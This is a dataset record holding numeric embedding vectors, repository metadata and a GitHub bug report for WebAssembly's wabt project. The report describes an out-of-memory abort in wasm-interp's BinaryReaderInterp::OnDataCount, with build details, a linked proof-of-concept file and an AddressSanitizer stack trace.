0.012258783914148808, 0.01081156637519598, 0.003288981970399618, -0.011361639946699142, -0.007353960536420345, 0.008316589519381523, 0.026220176368951797, -0.020994476974010468, -0.008905953727662563, -0.0050390674732625484, 0.005657900124788284, 0.015257994644343853, -0.004711642395704985, 0.004282716196030378, -0.019855039194226265, -0.002192108891904354, 0.024216337129473686, 0.009672127664089203, -0.0005848625442013144, 0.004672351758927107, -0.011846228502690792, 0.006358589045703411, -0.011702161282300949, -0.006283281370997429, 0.005386137869209051, -0.002503162482753396, 0.011826583184301853, 0.0024917025584727526, 0.0000051032220653723925, -0.020326530560851097, 0.006309475749731064, 0.008087391965091228, -0.014315011911094189, 0.012160556390881538, 0.014380495995283127, -0.0013964667450636625, 0.0021266238763928413, -0.013895907439291477, -0.0055563985370099545, 0.010962181724607944, 0.011066957376897335, -0.0074521880596876144, 0.007425994146615267, 0.00883392058312893, 0.03329255059361458, -0.0127106299623847, -0.015441352501511574, 0.0018581356853246689, 0.0007338408031500876, -0.006843178067356348, -0.014131654053926468, -0.011394382454454899, 0.00464943191036582, -0.018361981958150864, 0.005058712791651487, 0.0007330222288146615, 0.013712549582123756, 0.011472964659333229, -0.0076289973221719265, -0.01834888570010662, -0.019396644085645676, 0.008644014596939087, 0.007144408766180277, 0.0039814854972064495, -0.024727119132876396, 0.004014228004962206, 0.005841257981956005, -0.0060737296007573605, -0.02941584214568138, 0.024884283542633057, -0.005972228012979031, 0.022461339831352234, 0.005834709852933884, -0.008296944200992584, 0.0021479064598679543, 0.005929662846028805, -0.009488769806921482, -0.0025735588278621435, 0.010484141297638416, -0.016410529613494873, 0.021806489676237106, -0.008558884263038635, -0.003056510351598263, 0.01680343970656395, 0.0013448973186314106, -0.0009364348952658474, 0.00485243508592248, 0.0001341418392257765, 0.012638596817851067, 0.008290395140647888, -0.0016338496934622526, -0.029180096462368965, 0.013247606344521046, -0.011793840676546097, 0.004862258210778236, 0.0040404219180345535, 0.012998763471841812, -0.011774195358157158, 0.013182121329009533, 0.011951004154980183, 0.009835840202867985, -0.00673840194940567, -0.013542288914322853, 0.01675105094909668, -0.0010944172972813249, 0.0004465255478862673, 0.006954502314329147, -0.0033413697965443134, -0.0007854101713746786, -0.01896444335579872, -0.00008073067147051916, 0.004511913284659386, 0.006568141281604767, 0.020483694970607758, -0.020496791228652, 0.002341087209060788, -0.004626512061804533, 0.0012573112035170197, -0.0007845916552469134, 0.0009609917178750038, 0.006368412170559168, 0.016004523262381554, 0.0049572112038731575, 0.0014799600467085838, 0.0013907367829233408, -0.01875489205121994, -0.007124763447791338, 0.028708605095744133, 0.02126951329410076, 0.017248736694455147, 0.051209237426519394, -0.008290395140647888, 0.006823532283306122, 0.01972406916320324, 0.012638596817851067, -0.0008799540810286999, -0.015965232625603676, -0.002717625582590699, -0.04259141534566879, 0.00037121784407645464, -0.013489901088178158, 0.004420234356075525, -0.023692457005381584, -0.012193298898637295, 0.03172091394662857, 0.016371238976716995, 0.011617030948400497, 0.016161687672138214, 0.0033282728400081396, -0.007949873805046082, -0.0019432661356404424, 0.0069348569959402084, 0.015794971957802773, 0.006597609259188175, 0.007380154449492693, 0.008761887438595295, -0.017641646787524223, 0.008748790249228477, 0.018414368852972984, 0.006496107671409845, -0.026010625064373016, 0.002763465279713273, -0.005576043855398893, 0.017143961042165756, 0.017969071865081787, 0.014315011911094189, -0.004305636044591665, 0.0077468701638281345, 0.0000025548085886839544, -0.0006732672336511314, 0.013843519613146782, 0.0248057022690773, -0.01722254417836666, 0.013922101818025112, -0.005061987321823835, -0.008120134472846985, 0.0057364823296666145, 0.020614665001630783, -0.008205264806747437, -0.0011075143702328205, 0.00909586064517498, -0.016462918370962143, -0.016161687672138214, 0.003804676001891494, -0.009213733486831188, 0.0026963429991155863, 0.020928991958498955, 0.01717015542089939, 0.027032190933823586, 0.0038832579739391804, 0.0027143515180796385, 0.008977987803518772, 0.004135374911129475 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
### Environment ```shell OS : Linux 5.15.133.1-microsoft-standard-WSL2 #1 SMP Thu Oct 5 21:02:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux Commit : 9fdd024249b6b181d98a4164700ca6ee09f970d9 - 1471dffee8bf9939044b80d34256956a28138e96 Version : 1.0.33 (git~1.0.33-35-gdddc03d3) Clang Verison : 13.0.0 Build : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" && cmake .. && cmake --build . Affected Tool : wasm-interp Enabled Features : None Impact : OOM Program Abort (leading to DoS) ``` ### Proof of Concept [wasm-poc-02.zip](https://github.com/WebAssembly/wabt/files/14482128/wasm-poc-02.zip) ### Stack Trace Provide By AddressSanitizer ```shell ================================================================= ==2681==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x6330be8c8 bytes #0 0x519508 in operator new(unsigned long) /home/lain/llvm-project-llvmorg-13.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:95 #1 0x54e55b in __gnu_cxx::new_allocator<wabt::interp::DataDesc>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27 #2 0x54e500 in std::allocator_traits<std::allocator<wabt::interp::DataDesc> >::allocate(std::allocator<wabt::interp::DataDesc>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:443:20 #3 0x54e4bf in std::_Vector_base<wabt::interp::DataDesc, std::allocator<wabt::interp::DataDesc> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343:20 #4 0x5f4c78 in std::vector<wabt::interp::DataDesc, std::allocator<wabt::interp::DataDesc> >::reserve(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/vector.tcc:78:22 #5 0x5b03ea in wabt::interp::(anonymous namespace)::BinaryReaderInterp::OnDataCount(unsigned int) /home/lain/wabt_asan/src/interp/binary-reader-interp.cc:756:17 #6 0x702894 in wabt::(anonymous namespace)::BinaryReader::ReadDataCountSection(unsigned long) /home/lain/wabt_asan/src/binary-reader.cc:2846:3 #7 0x6ecfe5 in wabt::(anonymous namespace)::BinaryReader::ReadSections(wabt::(anonymous namespace)::BinaryReader::ReadSectionsOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:2969:26 #8 0x6e9d0f in wabt::(anonymous namespace)::BinaryReader::ReadModule(wabt::(anonymous namespace)::BinaryReader::ReadModuleOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:3012:3 #9 0x6e8d01 in wabt::ReadBinary(void const*, unsigned long, wabt::BinaryReaderDelegate*, wabt::ReadBinaryOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:3029:17 #10 0x58d752 in wabt::interp::ReadBinaryInterp(std::basic_string_view<char, std::char_traits<char> >, void const*, unsigned long, wabt::ReadBinaryOptions const&, std::vector<wabt::Error, std::allocator<wabt::Error> >*, wabt::interp::ModuleDesc*) /home/lain/wabt_asan/src/interp/binary-reader-interp.cc:1604:10 #11 0x5255ed in ReadModule(char const*, std::vector<wabt::Error, std::allocator<wabt::Error> >*, wabt::interp::RefPtr<wabt::interp::Module>*) /home/lain/wabt_asan/src/tools/wasm-interp.cc:324:3 #12 0x51fa08 in ReadAndRunModule(char const*) /home/lain/wabt_asan/src/tools/wasm-interp.cc:351:19 #13 0x51ecf7 in ProgramMain(int, char**) /home/lain/wabt_asan/src/tools/wasm-interp.cc:450:25 #14 0x51ff21 in main /home/lain/wabt_asan/src/tools/wasm-interp.cc:456:10 #15 0x7fb26ffa4082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 ==2681==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /home/lain/llvm-project-llvmorg-13.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:95 in operator new(unsigned long) ==2681==ABORTING ```
Out-of-Memory Program Abort in BinaryReaderInterp::OnDataCount()
https://api.github.com/repos/WebAssembly/wabt/issues/2397/comments
0
2024-03-04T13:47:29
2024-03-04T13:47:29Z
https://github.com/WebAssembly/wabt/issues/2397
2,166,891,614
2,397
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : Out-of-Memory Program Abort in BinaryReaderInterp::OnDataCount() Issue date: --- start body --- ### Environment ```shell OS : Linux 5.15.133.1-microsoft-standard-WSL2 #1 SMP Thu Oct 5 21:02:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux Commit : 9fdd024249b6b181d98a4164700ca6ee09f970d9 - 1471dffee8bf9939044b80d34256956a28138e96 Version : 1.0.33 (git~1.0.33-35-gdddc03d3) Clang Verison : 13.0.0 Build : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" && cmake .. && cmake --build . Affected Tool : wasm-interp Enabled Features : None Impact : OOM Program Abort (leading to DoS) ``` ### Proof of Concept [wasm-poc-02.zip](https://github.com/WebAssembly/wabt/files/14482128/wasm-poc-02.zip) ### Stack Trace Provide By AddressSanitizer ```shell ================================================================= ==2681==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x6330be8c8 bytes #0 0x519508 in operator new(unsigned long) /home/lain/llvm-project-llvmorg-13.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:95 #1 0x54e55b in __gnu_cxx::new_allocator<wabt::interp::DataDesc>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27 #2 0x54e500 in std::allocator_traits<std::allocator<wabt::interp::DataDesc> >::allocate(std::allocator<wabt::interp::DataDesc>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:443:20 #3 0x54e4bf in std::_Vector_base<wabt::interp::DataDesc, std::allocator<wabt::interp::DataDesc> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343:20 #4 0x5f4c78 in std::vector<wabt::interp::DataDesc, std::allocator<wabt::interp::DataDesc> >::reserve(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/vector.tcc:78:22 #5 0x5b03ea in wabt::interp::(anonymous namespace)::BinaryReaderInterp::OnDataCount(unsigned int) /home/lain/wabt_asan/src/interp/binary-reader-interp.cc:756:17 #6 0x702894 in wabt::(anonymous namespace)::BinaryReader::ReadDataCountSection(unsigned long) /home/lain/wabt_asan/src/binary-reader.cc:2846:3 #7 0x6ecfe5 in wabt::(anonymous namespace)::BinaryReader::ReadSections(wabt::(anonymous namespace)::BinaryReader::ReadSectionsOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:2969:26 #8 0x6e9d0f in wabt::(anonymous namespace)::BinaryReader::ReadModule(wabt::(anonymous namespace)::BinaryReader::ReadModuleOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:3012:3 #9 0x6e8d01 in wabt::ReadBinary(void const*, unsigned long, wabt::BinaryReaderDelegate*, wabt::ReadBinaryOptions const&) /home/lain/wabt_asan/src/binary-reader.cc:3029:17 #10 0x58d752 in wabt::interp::ReadBinaryInterp(std::basic_string_view<char, std::char_traits<char> >, void const*, unsigned long, wabt::ReadBinaryOptions const&, std::vector<wabt::Error, std::allocator<wabt::Error> >*, wabt::interp::ModuleDesc*) /home/lain/wabt_asan/src/interp/binary-reader-interp.cc:1604:10 #11 0x5255ed in ReadModule(char const*, std::vector<wabt::Error, std::allocator<wabt::Error> >*, wabt::interp::RefPtr<wabt::interp::Module>*) /home/lain/wabt_asan/src/tools/wasm-interp.cc:324:3 #12 0x51fa08 in ReadAndRunModule(char const*) /home/lain/wabt_asan/src/tools/wasm-interp.cc:351:19 #13 0x51ecf7 in ProgramMain(int, char**) /home/lain/wabt_asan/src/tools/wasm-interp.cc:450:25 #14 0x51ff21 in main /home/lain/wabt_asan/src/tools/wasm-interp.cc:456:10 #15 0x7fb26ffa4082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 ==2681==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /home/lain/llvm-project-llvmorg-13.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:95 in operator new(unsigned long) ==2681==ABORTING ``` --- end body ---
4,159
[ -0.040370870381593704, -0.012196253053843975, -0.011225935071706772, 0.011608396656811237, 0.034676454961299896, -0.018060652539134026, 0.0008388464921154082, 0.02804713137447834, -0.010156461037695408, 0.03144678473472595, -0.006523082964122295, 0.011523405089974403, 0.005336746107786894, -0.018032323569059372, 0.00743673974648118, -0.04374219477176666, -0.03124847076833248, 0.02542656660079956, -0.025667374953627586, -0.023117635399103165, -0.0027515937108546495, 0.002069892594590783, 0.016304166987538338, 0.00858412217348814, -0.011516322381794453, 0.014519348740577698, -0.016814114525914192, -0.0025798403657972813, -0.023386774584650993, 0.01082930900156498, -0.02580902725458145, 0.01041851844638586, -0.0159358698874712, 0.0030880174599587917, 0.009745670482516289, 0.01623333990573883, 0.040370870381593704, 0.060457151383161545, -0.009511943906545639, -0.002618794795125723, -0.017749018967151642, -0.02382589690387249, -0.025157427415251732, 0.018244801089167595, -0.000752527208533138, 0.0035182861611247063, 0.013138240203261375, 0.0011863369727507234, -0.013527783565223217, 0.004139785189181566, 0.02637563645839691, -0.04943661019206047, -0.010560169816017151, -0.0638001412153244, 0.044223811477422714, -0.02072371356189251, 0.044053830206394196, -0.00347047857940197, 0.00333236763253808, -0.0054642329923808575, -0.004585989285260439, -0.0004802894254680723, 0.033344924449920654, 0.014122722670435905, -0.005549224093556404, 0.03810443729162216, -0.03105015866458416, 0.03796278312802315, -0.030228575691580772, 0.024604983627796173, -0.015114287845790386, -0.05207134038209915, 0.003309349063783884, 0.034959759563207626, 0.015581740066409111, 0.008010431192815304, 0.03884102776646614, 0.014313952997326851, -0.01111969631165266, 0.015369261614978313, -0.02881205454468727, 0.02597901038825512, -0.03068186342716217, 0.02007211372256279, -0.007142811082303524, 0.01997295767068863, -0.02476080134510994, -0.06714313477277756, -0.018811410292983055, -0.050513166934251785, 0.023485932499170303, 0.009689008817076683, 0.007819200865924358, 0.01612001843750477, -0.014944305643439293, 0.005995428655296564, -0.05039984732866287, -0.011792544275522232, -0.03258000314235687, 0.0005192437674850225, -0.020865365862846375, 0.01631833054125309, -0.008229991421103477, 0.010574335232377052, -0.0068949200212955475, 0.026120662689208984, -0.015085957013070583, -0.020808706060051918, 0.038699377328157425, 0.14301204681396484, 0.008789517916738987, -0.012911596335470676, -0.04343055933713913, -0.018811410292983055, -0.004702852573245764, 0.01726740039885044, 0.022253558039665222, -0.012033352628350258, -0.061590369790792465, -0.022834332659840584, -0.023018479347229004, -0.009256970137357712, -0.01565256528556347, 0.01612001843750477, -0.008654948323965073, 0.03538471460342407, 0.01206168346107006, -0.03487476706504822, -0.028542915359139442, -0.037764471024274826, -0.0488133430480957, -0.036149635910987854, -0.02552572265267372, -0.03498809039592743, 0.016162514686584473, -0.02120533213019371, -0.01623333990573883, 0.04889833182096481, 0.016091687604784966, 0.0030632284469902515, -0.03997424617409706, -0.01365527044981718, 0.02027042768895626, 0.026673106476664543, -0.013534866273403168, 0.000049799597036326304, -0.02195608802139759, 0.0091507313773036, -0.016530809924006462, 0.0002123676094925031, -0.0067213959991931915, 0.000012851061910623685, 0.014335201121866703, 0.015213444828987122, 0.011424248106777668, -0.005991887301206589, 0.0412774458527565, 0.012621209025382996, -0.009058657102286816, 0.007358830887824297, -0.011962526477873325, -0.015440087765455246, 0.017933165654540062, -0.035243064165115356, -0.024619149044156075, -0.005754619836807251, 0.017791513353586197, 0.03816109895706177, 0.00797501765191555, -0.003366010030731559, -0.02589401975274086, 0.019576331600546837, 0.03291996568441391, 0.01388191431760788, -0.025072436779737473, 0.01487347949296236, 0.033061619848012924, 0.06051381304860115, -0.013131157495081425, 0.0020574978552758694, 0.019193870946764946, 0.009009079076349735, 0.017380721867084503, 0.018329791724681854, 0.023230958729982376, -0.0002284141373820603, 0.0035306806676089764, -0.019774645566940308, 0.023981714621186256, 0.000640533457044512, 0.018740583211183548, -0.004848045762628317, -0.027253879234194756, 0.01575172320008278, 0.012543301098048687, 0.02035541832447052, -0.028826219961047173, -0.029322002083063126, 0.02175777591764927, 0.025100767612457275, -0.010581417940557003, -0.020978687331080437, -0.026233984157443047, 0.010269783437252045, -0.033061619848012924, 0.03124847076833248, -0.00821582693606615, 0.014689330942928791, 0.021092010661959648, -0.03637627884745598, 0.004022921901196241, -0.018343957141041756, -0.001144726644270122, -0.01988796703517437, -0.02542656660079956, -0.0009384457371197641, -0.010333526879549026, 0.01808898337185383, -0.026248149573802948, 0.004908248316496611, 0.014901809394359589, -0.01800399273633957, 0.0014076685765758157, -0.03552636876702309, 0.00007956868648761883, -0.03742450475692749, -0.029406992718577385, -0.004578906577080488, -0.020213766023516655, 0.0004944546381011605, 0.05090979486703873, 0.004670980852097273, -0.016771618276834488, 0.010751401074230671, 0.014476853422820568, -0.021460305899381638, 0.006423926446586847, -0.009037408977746964, 0.017380721867084503, 0.015737557783722878, -0.002082287101075053, 0.023046810179948807, -0.03518640249967575, -0.03413817659020424, -0.018513940274715424, 0.03532805293798447, -0.04388384521007538, 0.011891700327396393, -0.008222909644246101, 0.016913270577788353, -0.010715987533330917, -0.010708904825150967, 0.010524757206439972, -0.015298435464501381, 0.0011960755800828338, -0.01206168346107006, 0.03677290678024292, 0.035413045436143875, -0.019165540114045143, -0.005807739682495594, 0.03209838271141052, -0.00030942147714085877, -0.022097740322351456, 0.04753847420215607, -0.008060009218752384, -0.007135728839784861, -0.004362887237221003, 0.024534158408641815, 0.0201571062207222, -0.016658296808600426, 0.05377116799354553, -0.028670402243733406, -0.014406027272343636, -0.013124074786901474, -0.020100444555282593, -0.003888352308422327, 0.027820488438010216, 0.020312922075390816, -0.0037431588862091303, -0.012082931585609913, 0.01678578369319439, -0.00948361400514841, -0.016488313674926758, 0.0197038184851408, -0.01865559257566929, 0.006310604512691498, 0.02559654973447323, -0.0020982229616492987, -0.007712961174547672, -0.042637307196855545, -0.0028684567660093307, 0.009313630871474743, -0.03733951598405838, 0.031475115567445755, 0.028854548931121826, 0.022381044924259186, -0.003396111074835062, 0.021318653598427773, -0.012727448716759682, -0.014483935199677944, -0.050881464034318924, -0.0005506728775799274, -0.003920224029570818, 0.000419865915318951, -0.02243770658969879, -0.0022345632314682007, -0.01811731420457363, -0.017409052699804306, 0.013832335360348225, -0.00415395013988018, 0.06606657803058624, -0.034959759563207626, 0.015440087765455246, -0.027409696951508522, -0.027707166969776154, -0.005818363279104233, 0.023230958729982376, -0.0029587598983198404, -0.006455798167735338, 0.005517352372407913, -0.03173008933663368, 0.012883266434073448, -0.042070697993040085, 0.03130513057112694, 0.05413946509361267, -0.016856608912348747, -0.017947331070899963, 0.035583026707172394, -0.06317687034606934, -0.006459339521825314, -0.0036935806274414062, -0.013456957414746284, -0.018712252378463745, -0.03884102776646614, -0.021686948835849762, -0.051363080739974976, -0.052666280418634415, 0.032976627349853516, 0.01327280979603529, 0.013896078802645206, -0.004504539538174868, 0.003459854517132044, -0.03274998441338539, -0.0048445044085383415, -0.01790483668446541, 0.01755070500075817, -0.0010650473413988948, 0.000003019100404344499, -0.01678578369319439, 0.010113965719938278, 0.0010349462972953916, 0.05462108179926872, 0.019066384062170982, 0.05272294208407402, 0.019859636202454567, -0.01206168346107006, -0.018329791724681854, -0.008754105307161808, -0.003229669760912657, 0.0014669854426756501, 0.005517352372407913, -0.012876183725893497, -0.009993561543524265, -0.012557465583086014, 0.010099800303578377, -0.00008277799497591332, 0.03068186342716217, -0.028557080775499344, -0.021644452586770058, -0.0347047857940197, -0.0012925761984661222, 0.05572596937417984, -0.007415491621941328, 0.010220205411314964, -0.03949262946844101, -0.03408151492476463, 0.03688623011112213, -0.010234369896352291, -0.026573948562145233, 0.010900135152041912, 0.00015128011000342667, 0.03113514930009842, 0.016360826790332794, -0.02691391482949257, 0.02784881927073002, -0.0033164317719638348, -0.007146352436393499, 0.07762539386749268, -0.040852490812540054, 0.012302491813898087, -0.01107011828571558, 0.03345824405550957, -0.04022921994328499, -0.04003090783953667, -0.001661757123656571, 0.034676454961299896, 0.0015519767766818404, -0.05649089068174362, 0.01576588861644268, -0.024519992992281914, -0.012507887557148933, -0.01990213245153427, 0.043572209775447845, 0.02402421087026596, 0.03716953098773956, 0.013209066353738308, -0.014731827192008495, -0.025568218901753426, 0.002617024118080735, -0.0025585924740880728, 0.03793445602059364, -0.01808898337185383, -0.02177194133400917, 0.02512909658253193, 0.026899749413132668, 0.023060975596308708, -0.002002607798203826, 0.001126134884543717, -0.05790741369128227, 0.03461979329586029, -0.05683085694909096, -0.005666087381541729, 0.02522825449705124, 0.030625201761722565, 0.0007020636112429202, 0.004299143794924021, -0.008449552580714226, 0.0091507313773036, -0.025568218901753426, -0.014271457679569721, 0.015397592447698116, 0.018315626308321953, -0.026588113978505135, 0.015893375501036644, 0.0003165040980093181, -0.05056982859969139, -0.031078489497303963, -0.003401423105970025, -0.029435323551297188, -0.045442018657922745, 0.011976691894233227, 0.04258064553141594, -0.025171592831611633, -0.01298950519412756, 0.004986156709492207, -0.02100701816380024, -0.03932264447212219, 0.0002243195049231872, 0.009412787854671478, -0.02073787897825241, -0.014972635544836521, 0.012720366008579731, -0.026715600863099098, 0.010142296552658081, 0.04615028202533722, -0.011098448187112808, 0.0010747859487310052, -0.012720366008579731, -0.0007715617539361119, 0.013456957414746284, -0.011041787452995777, -0.005099478643387556, -0.012479557655751705, 0.03745283558964729, -0.007847530767321587, 0.06079711765050888, 0.008647865615785122, -0.04804842174053192, 0.004433713387697935, -0.019009722396731377, -0.005846693646162748, 0.032891638576984406, 0.005269461311399937, 0.005382782779633999, 0.003358927322551608, 0.009370291605591774, 0.003732535056769848, -0.00174143654294312, 0.008392891846597195, -0.06436675041913986, 0.0036794154439121485, -0.06538664549589157, -0.017479879781603813, -0.011757130734622478, 0.006693065632134676, -0.0012553924461826682, -0.004539952613413334, 0.02881205454468727, 0.018839741125702858, 0.013485287316143513, 0.009873157367110252, -0.006916167680174112, -0.042523983865976334, -0.021927757188677788, 0.0007697910768911242, 0.01651664450764656, -0.030370227992534637, -0.030228575691580772, 0.0516180545091629, 0.04164574295282364, 0.007118022069334984, -0.049946557730436325, 0.03243834897875786, -0.035243064165115356, 0.014944305643439293, 0.00087071827147156, -0.017933165654540062, 0.05926727131009102, -0.03923765569925308, -0.04858670011162758, -0.001984901260584593, -0.045640334486961365, 0.02834460139274597, -0.008378726430237293, -0.000845929142087698, -0.0057475371286273, 0.003477561054751277, -0.01959049701690674, 0.046575237065553665, 0.031645096838474274, -0.02468997612595558, -0.009781083092093468, 0.0016582158859819174, 0.04201403632760048, -0.013258644379675388, 0.01233790535479784, 0.026729766279459, 0.012019187211990356, 0.005110102705657482, -0.0065903677605092525, 0.005308415740728378, 0.010616831481456757, 0.004469126462936401, 0.02794797532260418, -0.011969609186053276, -0.011516322381794453, 0.01050350908190012, 0.008994913659989834, -0.00043757245293818414, 0.007408408913761377, 0.004270813427865505, 0.028273776173591614, -0.028783723711967468, 0.018428949639201164, -0.009816496632993221, 0.02439250610768795, -0.009554440155625343, 0.004426630679517984, -0.018131479620933533, 0.01840061880648136, -0.003378404537215829, -0.02167278341948986, 0.00980941392481327, 0.0015935871051624417, -0.007727126590907574, 0.005131350364536047, 0.01716824434697628, 0.012394566088914871, -0.008966582827270031, -0.009349044412374496, 0.010206039994955063, 0.004026463255286217, -0.005368617828935385, -0.010241452604532242, 0.01745154894888401, -0.020312922075390816, 0.0034474600106477737, 0.02194192260503769, -0.04232567176222801, -0.029152018949389458, 0.013464040122926235, 0.0060414657928049564, -0.012267079204320908, -0.011381752789020538, -0.004681604448705912, 0.020015453919768333, -0.018556436523795128, -0.002985319821164012, 0.02082287147641182, -0.01678578369319439, 0.019562166184186935, -0.017380721867084503, 0.02110617607831955, 0.04119245335459709, 0.018698088824748993, -0.033713217824697495, 0.002562133828178048, -0.014717661775648594, 0.0440821573138237, -0.018811410292983055, -0.0319000706076622, 0.0067532677203416824, -0.016771618276834488, -0.02665894106030464, 0.006246861070394516, 0.007833365350961685, 0.009228639304637909, 0.00848496612161398, 0.016176680102944374, -0.035413045436143875, 0.001970736077055335, 0.01294700987637043, -0.003500579623505473, -0.03731118515133858, -0.04447878524661064, 0.021417809650301933, 0.00017640122678130865, 0.0032456056214869022, -0.04088082164525986, 0.03810443729162216, -0.002169049112126231, 0.013159487396478653, 0.03481810539960861, -0.005828987341374159, -0.005832528695464134, -0.02082287147641182, 0.043487221002578735, 0.0005520008271560073, -0.03096516616642475, 0.03461979329586029, 0.002967613283544779, -0.05374283716082573, -0.00044819636968895793, -0.0032686241902410984, 0.019307192414999008, 0.013966904953122139, -0.014901809394359589, -0.0126637052744627, -0.009009079076349735, -0.024364175274968147, -0.020865365862846375, 0.02898203581571579, 0.0075713093392550945, -0.02636147104203701, -0.022281888872385025, 0.04765179380774498, 0.027834653854370117, 0.006979911122471094, -0.017281565815210342, -0.010255618020892143, -0.005010945722460747, 0.023882558569312096, -0.018032323569059372, 0.0028153371531516314, -0.026021506637334824, 0.004398300312459469, -0.005003863479942083, 0.0003868875210173428, 0.03396819159388542, 0.02184276655316353, 0.0018467903137207031, 0.006299980916082859, 0.013917326927185059, 0.01960466243326664, -0.013116992078721523, 0.008789517916738987, 0.039634279906749725, 0.059153951704502106, 0.010014809668064117, 0.026007341220974922, -0.016927435994148254, -0.04167407378554344, -0.004720558878034353, -0.002115929499268532, 0.02616315893828869, -0.03459146246314049, -0.041334107518196106, -0.007323417812585831, 0.004210611339658499, 0.029973601922392845, -0.015255940146744251, -0.03105015866458416, -0.02381173148751259, 0.0017325832741335034, -0.029293671250343323, -0.026148993521928787, 0.011799626983702183, 0.02167278341948986, -0.019264696165919304, -0.0008813421591185033, -0.01988796703517437, 0.0024488121271133423, 0.004826798103749752, 0.012791192159056664, -0.01885390467941761, -0.00015670272114221007, -0.013676518574357033, -0.005733372177928686, -0.018443115055561066, -0.014228961430490017, 0.01808898337185383, 0.010220205411314964, 0.023103471845388412, 0.007309252396225929, 0.008435387164354324, -0.022352714091539383, 0.014228961430490017, 0.0023036187049001455, 0.004391217604279518, -0.004554117564111948, -0.015879210084676743, 0.039719272404909134, -0.009221557527780533, -0.006976369768381119, 0.01755070500075817, 0.021177001297473907, -0.00239038048312068, -0.003757324069738388, 0.03603631630539894, 0.01562423538416624, -0.025964844971895218, -0.006795763503760099, -0.015496748499572277, 0.010142296552658081, 0.024137532338500023, -0.011587148532271385, 0.03864271566271782, -0.003937930800020695, -0.002739198971539736, 0.012472474947571754, -0.028443757444620132, -0.008832013234496117, 0.005003863479942083, -0.046405255794525146, 0.011473827064037323, -0.02963363565504551, -0.01018479187041521, -0.021247826516628265, 0.019009722396731377, 0.010680574923753738, 0.020780375227332115, -0.052382975816726685, -0.01148799154907465, 0.0015909310895949602, -0.011891700327396393, 0.009419870562851429, 0.00030388819868676364, 0.009264052845537663, -0.016261670738458633, -0.012812440283596516, 0.005921061150729656, 0.0058679417707026005, -0.0046143196523189545, -0.04895499348640442, 0.01698409579694271, -0.007854613475501537, 0.009540274739265442, 0.012167922221124172, -0.04566866531968117, 0.03422316908836365, -0.008506213314831257, 0.010000644251704216, -0.008456635288894176, -0.021035348996520042, -0.008973665535449982, 0.0007135728956200182, -0.005131350364536047, -0.004238941706717014, 0.0018202305072918534, -0.009653596207499504, 0.003309349063783884, 0.011459661647677422, 0.010092717595398426, 0.034846436232328415, 0.031220141798257828, -0.018542271107435226, 0.020893696695566177, -0.02430751360952854, 0.02607816644012928, 0.01857060194015503, -0.005262378603219986, -0.012777026742696762, -0.01743738353252411, 0.013301139697432518, 0.013258644379675388, -0.01708325371146202, -0.01008563581854105, 0.011381752789020538, 0.005127809010446072, 0.03320327028632164, -0.020213766023516655, 0.019576331600546837, -0.001988442614674568, 0.019448844715952873, 0.0008808994898572564, -0.006257485132664442, 0.02090786211192608, -0.02204107865691185, 0.035299722105264664, 0.015978366136550903, -0.016346661373972893, -0.037112873047590256, 0.04541368782520294, -0.0028702274430543184, -0.007861696183681488, -0.02831627056002617, -0.0017458631191402674, 0.005467774346470833, -0.02597901038825512, -0.03702788054943085, 0.026715600863099098, 0.018032323569059372, -0.03518640249967575, 0.012635374441742897, -0.004019380547106266, -0.026106497272849083, -0.011509239673614502, -0.005056982859969139, -0.024463331326842308, 0.007720043882727623, 0.005386324133723974, 0.045073725283145905, -0.005481939297169447, -0.007911274209618568, 0.041220784187316895, -0.001095148385502398, 0.006523082964122295, 0.010439765639603138, 0.01933552324771881, 0.017593201249837875, 0.01519927941262722, 0.025766532868146896, 0.030171914026141167, -0.054167795926332474, 0.022196896374225616, -0.0016396240098401904, 0.058474019169807434, 0.0010446847882121801, 0.030540211126208305, -0.007288004737347364, -0.006600991822779179, -0.01706908829510212, 0.006392054725438356, 0.0053757005371153355, -0.014080227352678776, 0.016955766826868057, -0.003927306737750769, 0.0007861696067266166, -0.013152404688298702, 0.0572274811565876, -0.0044053830206394196, -0.004508080892264843, -0.006863048300147057, -0.021885262802243233, -0.012876183725893497, -0.0393793061375618, 0.0067213959991931915, -0.01800399273633957, -0.002606400055810809, 0.009412787854671478, 0.02214023657143116, 0.04391217604279518, -0.0159500353038311, 0.024718305096030235, -0.0459519661962986, 0.005163222085684538, 0.02881205454468727, 0.0016892022686079144, 0.004837422166019678, 0.009221557527780533, 